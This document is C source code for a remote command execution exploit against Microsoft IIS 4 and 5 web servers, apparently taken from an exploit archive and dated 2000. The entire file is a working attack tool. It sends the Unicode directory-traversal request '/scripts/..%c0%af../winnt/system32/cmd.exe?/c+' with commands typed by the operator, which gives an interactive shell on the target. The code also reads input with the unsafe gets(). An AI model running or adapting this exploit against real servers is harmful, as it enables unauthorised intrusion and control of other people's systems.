/* iisex iis exploit (<- nost's idea) v2 * -------------------------------------- * Okay.. the first piece of code was not really finished. * So, i apologize to everybody.. * * by incubus <[email protected]> * * grtz to: Bio, nos, zoa, reg and vor... (who else would stay up * at night to exploit this?) to securax (#securax@efnet) - also * to kim, glyc, s0ph, tessa, lamagra and steven. */ #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> int main(int argc, char **argv){ char buffy[666]; /* well, what else? I dunno how long your commands are.. */ char buf[500]; char rcvbuf[8192]; int i, sock, result; struct sockaddr_in name; struct hostent *hostinfo; if (argc < 2){ printf ("try %s www.server.com\n", argv[0]); printf ("will let you play with cmd.exe of an IIS4/5 server.\n"); printf ("by incubus <[email protected]>\n\n"); exit(0); } printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n"); printf ("act like a cmd.exe kiddie, type quit to quit.\n"); for (;;) { printf ("\n[enter cmd> "); gets(buf); if (strstr(buf, "quit")) exit(0); i=0; while (buf[i] != '\n'){ if(buf[i] == 32) buf[i] = 43; i++; } hostinfo=gethostbyname(argv[1]); if (!hostinfo){ herror("Oops"); exit(-1); } name.sin_family=AF_INET; name.sin_port=htons(80); name.sin_addr=*(struct in_addr *)hostinfo->h_addr; sock=socket(AF_INET, SOCK_STREAM, 0); result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in)); if (result != 0) { herror("Oops"); exit(-1); } if (sock < 0){ herror("Oops"); exit(-1); } strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+"); strcat(buffy,buf); strcat(buffy, " HTTP/1.0\n\n"); send(sock, buffy, sizeof(buffy), 0); recv(sock, rcvbuf, sizeof(rcvbuf), 0); printf ("%s", rcvbuf); close(sock); } } // milw0rm.com [2000-11-18]